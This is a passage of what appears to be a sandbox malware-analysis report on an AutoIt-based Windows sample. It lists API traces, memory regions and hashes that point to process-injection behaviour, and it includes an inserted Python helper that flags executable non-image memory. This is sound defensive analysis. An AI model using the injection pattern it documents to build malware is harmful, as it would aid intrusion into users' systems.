                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 975902462-1005189915
                                                        • Opcode ID: a425da5379129f5d5d7a9758f4f62b7cbf85d6144b89b90b59803135701f73e7
                                                        • Instruction ID: 16a618e8f2b9236449edc8a53bdd268b2742316f4375c2bedb39fa40a15197a0
                                                        • Opcode Fuzzy Hash: a425da5379129f5d5d7a9758f4f62b7cbf85d6144b89b90b59803135701f73e7
                                                        • Instruction Fuzzy Hash: A121E2B5901318AFDB10DFA4E989BCDBBB4FB08710F00811AF611A62A0D7B80545DFA9

                                                        Control-flow Graph

                                                         Control-flow graph (rendered graph not reproduced; recovered from the node list): entry block 76c8b7-76c8f1, nodes 1369-1492. Win32 calls sit in blocks 76cafb-76cb28 (VariantInit), 76ca86-76caa3 (VariantClear), 76caa5-76cab9 (SysAllocString) and 76cc41-76cc50 (VariantClear); the remaining nodes call internal functions only.
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: 356c0f8af9236080ad1f4d4f45906e01c93419aa33d1f135e3fc77bd205ecaf5
                                                        • Instruction ID: 164b7f6fbe6b660ae71002aa0cc545a989b83e79203a5047fa400909240c54d5
                                                        • Opcode Fuzzy Hash: 356c0f8af9236080ad1f4d4f45906e01c93419aa33d1f135e3fc77bd205ecaf5
                                                        • Instruction Fuzzy Hash: 9FE1B5B1A00219AFDF11DFA4D845ABE77B5FF48354F148029FD8AA7281D778AD41CBA0

                                                        Control-flow Graph

                                                         Control-flow graph (rendered graph not reproduced; recovered from the node list): entry block 713dcb-713df1 calling 713f9b, nodes 1494-1592, most of them in the 783a09-783c7c range. No Win32 API appears in a node; every call edge targets an internal function (713f9b, 75cc82, 73010a, 72ac65, 753460, 7530ac and others), with the Win32 calls reached only through the subcalls listed under APIs.
                                                        APIs
                                                          • Part of subcall function 00713F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007134E2,?,00000001), ref: 00713FCD
                                                        • _free.LIBCMT ref: 00783C27
                                                        • _free.LIBCMT ref: 00783C6E
                                                          • Part of subcall function 0071BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,007D22E8,?,00000000,?,00713E2E,?,00000000,?,007ADBF0,00000000,?), ref: 0071BE8B
                                                          • Part of subcall function 0071BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00713E2E,?,00000000,?,007ADBF0,00000000,?,00000002), ref: 0071BEA7
                                                          • Part of subcall function 0071BDF0: __wsplitpath.LIBCMT ref: 0071BF19
                                                          • Part of subcall function 0071BDF0: _wcscpy.LIBCMT ref: 0071BF31
                                                          • Part of subcall function 0071BDF0: _wcscat.LIBCMT ref: 0071BF46
                                                          • Part of subcall function 0071BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0071BF56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<q$G-q
                                                        • API String ID: 1510338132-2170838863
                                                        • Opcode ID: 2d53f84cd4d80f501c36eaa6b71a272675ed14a269e4bb71a7759f58d277c188
                                                        • Instruction ID: 94e1f00868466605f4482a50945da95132d29f6e7d2ff6457f77388de65958ee
                                                        • Opcode Fuzzy Hash: 2d53f84cd4d80f501c36eaa6b71a272675ed14a269e4bb71a7759f58d277c188
                                                        • Instruction Fuzzy Hash: 01917371940219EFCF04EFA8CC559EEB7B4BF09710F104529F816AB291DB789E45CB60

                                                        Control-flow Graph

                                                         Control-flow graph (rendered graph not reproduced; recovered from the node list): entry block 4d72600-4d726ae calling 4d70000, nodes 1597-1650. Win32 calls sit in blocks 4d726b5-4d726db (CreateFileW), 4d726f9-4d72713 and 4d72738-4d72778 (VirtualAlloc), 4d7271a-4d72731 (ReadFile), 4d72800-4d72804 (CloseHandle), 4d72810-4d7281b and 4d728ec-4d728f7 (VirtualFree). Block 4d7281e-4d72827 has an edge back to the CreateFileW block, so the open/allocate/read sequence runs in a loop.
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04D726D1
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04D728F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                        • Instruction ID: 75e12ae16508495e09ec1b9cde01578f786ba9215502017027d12b0c110788b2
                                                        • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                        • Instruction Fuzzy Hash: 92A10D74E00249EBDB14CFA4C994BEEB7B5FF48304F208599E501BB280E779AA41DF55
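The dump names in the Memory Dump Source lines carry the region's base address and page protection, and the 04D70000 region (protection 00000040, "based on PE: false") is executable memory with no PE image behind it, which is how unpacked or injected code shows up in a dump listing. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it parses API lines and Source File lines in the format used on this page and flags such regions. The Win32 constant values are the documented ones; the layout of the .sdmp name (base in the fourth field, page protection in the fifth, memory type in the seventh) is inferred from the values on this page and is an assumption. Parameter names are applied only when the listed argument count matches the API's parameter count, because the listing sometimes carries extra stack slots (the VirtualFree line above shows ten values for a three-parameter call).

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Documented Win32 values; EXECUTABLE_MASK covers the four PAGE_EXECUTE* protections.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE_MASK = 0xF0
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Parameter names are applied only when the listed argument count matches exactly,
# because the listing sometimes appends extra stack slots after the real arguments.
SIGNATURES = {
    "CreateFileW": ("lpFileName", "dwDesiredAccess", "dwShareMode", "lpSecurityAttributes",
                    "dwCreationDisposition", "dwFlagsAndAttributes", "hTemplateFile"),
    "VirtualFree": ("lpAddress", "dwSize", "dwFreeType"),
}
NAMED_VALUES = {
    ("CreateFileW", "dwDesiredAccess"): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileW", "dwCreationDisposition"): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING"},
    ("VirtualFree", "dwFreeType"): {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"},
}

# "Name.MODULE(args), ref: ADDR", optionally prefixed with "Part of subcall function ADDR:".
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# ASSUMPTION (inferred from this page): 8 dot-separated fields, base at index 3,
# page protection at index 4, memory type at index 6.
DUMP_RE = re.compile(r"Source File:\s*(?P<fields>[0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+){7})\.sdmp,.*?"
                     r"based on PE:\s*(?P<pe>true|false)")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int
    caller: Optional[int]                   # set for "Part of subcall function" entries
    decoded: dict = field(default_factory=dict)

@dataclass
class Region:
    base: int
    protect: int
    mem_type: int
    pe_backed: bool

    def suspicious(self) -> bool:
        # Executable memory with no PE image behind it: unpacked or injected code.
        return bool(self.protect & EXECUTABLE_MASK) and not self.pe_backed

    def describe(self) -> str:
        return (f"{self.base:08X} {PAGE_PROTECT.get(self.protect, hex(self.protect))} "
                f"{MEM_TYPE.get(self.mem_type, hex(self.mem_type))} pe={self.pe_backed}")

def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                         # value the sandbox could not recover
    try:
        return int(tok, 16)
    except ValueError:
        return tok                          # string argument, e.g. a registry path

def decode(call: ApiCall) -> dict:
    sig = SIGNATURES.get(call.name)
    if not sig or len(call.args) != len(sig):
        return {}                           # count mismatch: do not guess positions
    return {p: NAMED_VALUES[(call.name, p)][v] for p, v in zip(sig, call.args)
            if (call.name, p) in NAMED_VALUES and v in NAMED_VALUES[(call.name, p)]}

def parse_listing(text: str):
    calls, regions = [], []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            call = ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                           int(m["caller"], 16) if m["caller"] else None)
            call.decoded = decode(call)
            calls.append(call)
            continue
        m = DUMP_RE.search(line)
        if m:
            f = m["fields"].split(".")
            regions.append(Region(int(f[3], 16), int(f[4], 16), int(f[6], 16), m["pe"] == "true"))
    return calls, regions

# Constructed input: lines copied by hand from this report's listing.
SAMPLE = r"""
• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04D724EF
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04D728F7
  • Part of subcall function 04D722A0: Sleep.KERNEL32(000001F4), ref: 04D722B1
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0072EADA,?,?), ref: 0072EB27
• _memmove.LIBCMT ref: 0075C71D
• Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
• Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
"""
```

Run `parse_listing(SAMPLE)` and call `suspicious()` on each returned Region: the 04D70000 region (PAGE_EXECUTE_READWRITE, MEM_PRIVATE, no PE) is flagged, the 00711000 region (same protection but MEM_IMAGE, backed by the PE) is not. The CreateFileW line with exactly seven values decodes to GENERIC_READ and OPEN_EXISTING, while the ten-value VirtualFree line is left undecoded rather than mis-assigned.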

                                                        Control-flow Graph

                                                         Control-flow graph (rendered graph not reproduced; recovered from the node list): entry block 72eb05-72eb2f calling 71c4cd and RegOpenKeyExW, nodes 1706-1718. RegQueryValueExW sits in blocks 784b17-784b2e and 784b30-784b6d (the second after calls to 73010a and 714bce), RegCloseKey in block 784b91-784b9a.
                                                        APIs
                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0072EADA,?,?), ref: 0072EB27
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0072EADA,?,?), ref: 00784B26
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0072EADA,?,?), ref: 00784B65
                                                        • RegCloseKey.ADVAPI32(?,?,0072EADA,?,?), ref: 00784B94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: QueryValue$CloseOpen
                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                        • API String ID: 1586453840-614718249
                                                        • Opcode ID: e3a5c3afb200d4c0e94c36ec6a761369a6caade82ee0888e0cc76fff6dfc1ed2
                                                        • Instruction ID: 4e0789d781564043cfc67d68f4b9c97ba8a4de2e161b1c61358f80a1c5f1b6b1
                                                        • Opcode Fuzzy Hash: e3a5c3afb200d4c0e94c36ec6a761369a6caade82ee0888e0cc76fff6dfc1ed2
                                                        • Instruction Fuzzy Hash: 3C1184B1640108FEEB14EBA8CD8AEFE7BBCEF04354F504055F506D2190EAB49E46D760
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00712ECB
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00712EEC
                                                        • ShowWindow.USER32(00000000), ref: 00712F00
                                                        • ShowWindow.USER32(00000000), ref: 00712F09
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 5a5bf0a6d97ebae38c3edac5e06898715a2e7ff913da328972b7fc010750714c
                                                        • Instruction ID: 21acc66ed30d0eaba126f956c345ea118730562cdb2e94c0a505d5be9c2e9425
                                                        • Opcode Fuzzy Hash: 5a5bf0a6d97ebae38c3edac5e06898715a2e7ff913da328972b7fc010750714c
                                                        • Instruction Fuzzy Hash: 1EF03A70A412D47AE7306767AC08E672F7DD7C7F20F41C11FBA08A21B0C1690C81CAB4
                                                        APIs
                                                          • Part of subcall function 04D722A0: Sleep.KERNEL32(000001F4), ref: 04D722B1
                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04D724EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: KSYQLPIIZC1YEZ6TCW6FEQAX1SUN
                                                        • API String ID: 2694422964-4263944113
                                                        • Opcode ID: bca3a1b0a92a29403694052cec8b2228bbeb688bf58aaf2cc35a834f93522215
                                                        • Instruction ID: 088aaa54a1ea2073520c2d4bf7ce197f5b417c7a61d4df20345a3af56286344c
                                                        • Opcode Fuzzy Hash: bca3a1b0a92a29403694052cec8b2228bbeb688bf58aaf2cc35a834f93522215
                                                        • Instruction Fuzzy Hash: C3616330D04288DAEF11DBB4C858BDFBB74AF19304F044198E6497B2C1E6B95B49CBA5
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0078454E
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        • _memset.LIBCMT ref: 00713965
                                                        • _wcscpy.LIBCMT ref: 007139B5
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007139C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: 4d2cfbb444d58a8214114a747c0529ecef85c9b51888bea5e8f95239f3687bce
                                                        • Instruction ID: 231d3b5d9bf558336faf708e12232bc30fa0c324078942e1629e8456d58a9ca9
                                                        • Opcode Fuzzy Hash: 4d2cfbb444d58a8214114a747c0529ecef85c9b51888bea5e8f95239f3687bce
                                                        • Instruction Fuzzy Hash: CE31C471009340EBD321EB64DC49FDA77F8AB44354F40851BF584920E1DBBCAA88CB96
                                                        APIs
                                                        • CLSIDFromProgID.COMBASE ref: 0074A874
                                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0074A88F
                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 0074A89D
                                                        • CoTaskMemFree.COMBASE(00000000), ref: 0074A8AD
                                                        • CLSIDFromString.COMBASE(?,?), ref: 0074A8B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: ff50c921e63452eeb6b5bf5cc1eb4e732f9b1cf8b9ef0e11277954c7ee37aa1e
                                                        • Instruction ID: 04e904c36f9c9758f2c681927fad16a9f694c90b2bdbe0caf01d594e92f89df2
                                                        • Opcode Fuzzy Hash: ff50c921e63452eeb6b5bf5cc1eb4e732f9b1cf8b9ef0e11277954c7ee37aa1e
                                                        • Instruction Fuzzy Hash: EC018F76601204BFDB224F54DC44BAA7BFDEF44361F108025B901D2210D778DD429BA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dE|
                                                        • API String ID: 0-1679965369
                                                        • Opcode ID: 8e8d2ed35e744965c5f2b3ac39a76137f9eb7e8a20403137d7a051c741acb4c9
                                                        • Instruction ID: 7caec784307535b76572514f28bb85ea2a291dbd22176b130f92cbcc9f6c7b3c
                                                        • Opcode Fuzzy Hash: 8e8d2ed35e744965c5f2b3ac39a76137f9eb7e8a20403137d7a051c741acb4c9
                                                        • Instruction Fuzzy Hash: 2EF17A71608701DFC710DF28D885B5AB7E1FF88314F14892EF99A9B292D778E945CB82
                                                        APIs
                                                        • SHGetMalloc.SHELL32(1<q), ref: 00713A7D
                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00713AD2
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00713A8F
                                                          • Part of subcall function 00713B1E: _wcsncpy.LIBCMT ref: 00713B32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                        • String ID: 1<q
                                                        • API String ID: 3981382179-2384031456
                                                        • Opcode ID: d27708dda55e0887d3690afc4ca342b4c9ec8fa32d18798b1d836f79455a8b19
                                                        • Instruction ID: ef207dbc80a8d06e56148c66a020e7517795d6fde01639c86f9ee60b30581954
                                                        • Opcode Fuzzy Hash: d27708dda55e0887d3690afc4ca342b4c9ec8fa32d18798b1d836f79455a8b19
                                                        • Instruction Fuzzy Hash: 34218776B00114ABCB24DF99DC88DEE77BEEF88710B108095F509DB291EB749E46CB94
                                                        APIs
                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0072C948,SwapMouseButtons,00000004,?), ref: 0072C979
                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0072C948,SwapMouseButtons,00000004,?,?,?,?,0072BF22), ref: 0072C99A
                                                        • RegCloseKey.KERNEL32(00000000,?,?,0072C948,SwapMouseButtons,00000004,?,?,?,?,0072BF22), ref: 0072C9BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: f44622898601264ac533d4b2d7df9c58c9ab2a5375847d550fb613e7a84b04c1
                                                        • Instruction ID: 93f5a15b1341a738d3a3fded780d9380533ecdf12456e0f50706a99a8ec3588a
                                                        • Opcode Fuzzy Hash: f44622898601264ac533d4b2d7df9c58c9ab2a5375847d550fb613e7a84b04c1
                                                        • Instruction Fuzzy Hash: C7117C75511218BFDB228F64EC44EAE77B8EF14740F00841AA981E7214E235AE919B64
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 04D71A5B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04D71AF1
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 04D71B13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1692690521.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4d70000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                        • Instruction ID: 00ae8122b3328f43f8b6f7cad62def3bc65ed1cb28b5e7c2a0de74e006ce2c3a
                                                        • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
